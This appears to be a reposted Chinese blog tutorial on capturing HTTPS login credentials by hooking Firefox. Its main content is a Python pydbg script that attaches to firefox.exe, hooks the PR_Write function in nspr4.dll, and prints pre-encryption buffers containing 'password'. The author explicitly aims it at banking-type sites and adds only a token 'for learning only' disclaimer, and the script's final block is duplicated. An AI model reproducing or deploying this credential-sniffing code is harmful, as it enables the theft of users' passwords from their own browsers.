利用python的hook技术破解htt
短信预约 -IT技能 免费直播动态提醒
相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后的内容,对我们的利用价值不是很高,所以一些大的网站----涉及到“大米”的网站,采用的都是http是协议,嘿嘿,即便这样,还是有办法能看到他的用户名和密码的,嘿嘿,本文只是用于技术学习,只是和大家交流技术,希望不要用于做违法的事情,这个例子是在firefox浏览器下登录https协议的网站,我们预先打开程序,就来了个捕获用户名和密码:
下面是源代码:
- #!/ur/bin/env python
- from pydbg import *
- from pydbg.defines import *
-
- import utils
- import sys
-
- dbg = pydbg()
- found_firefox = False
-
- pattern = "password"
-
-
- def ssl_sniff( dbg, args ):
- buffer = ""
- offset = 0
- while 1:
- byte = dbg.read_process_memory( args[1] + offset, 1 )
- if byte != "\x00":
- buffer += byte
- offset += 1
- continue
- else:
- break
- if pattern in buffer:
- print "Pre-Encrypted: %s" % buffer
- return DBG_CONTINUE
- # 寻找firefox.exe的进程
- for (pid, name) in dbg.enumerate_processes():
- if name.lower() == "firefox.exe":
- found_firefox = True
- hooks = utils.hook_container()
- dbg.attach(pid)
- print "[*] Attaching to firefox.exe with PID: %d" % pid
- # 得到firefox的hook的 address
- hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
- if hook_address:
- # 添加hook的内容,包括他的pid,地址,嗅探类型
-
- hooks.add( dbg, hook_address, 2, ssl_sniff, None )
- print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
- break
- else:
- print "[*] Error: Couldn't resolve hook address."
- sys.exit(-1)
- if found_firefox:
- print "[*] Hooks set, continuing process."
- dbg.run()
- else:
- print "[*] Error: Couldn't find the firefox.exe process."
- sys.exit(-1)
-
- if found_firefox:
- print "[*] Hooks set, continuing process."
- dbg.run()
- else:
- print "[*] Error: Couldn't find the firefox.exe process."
- sys.exit(-1)
演示视频见链接:http://www.linux520.com/stcs/2011-03-18/174.html#ecms
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341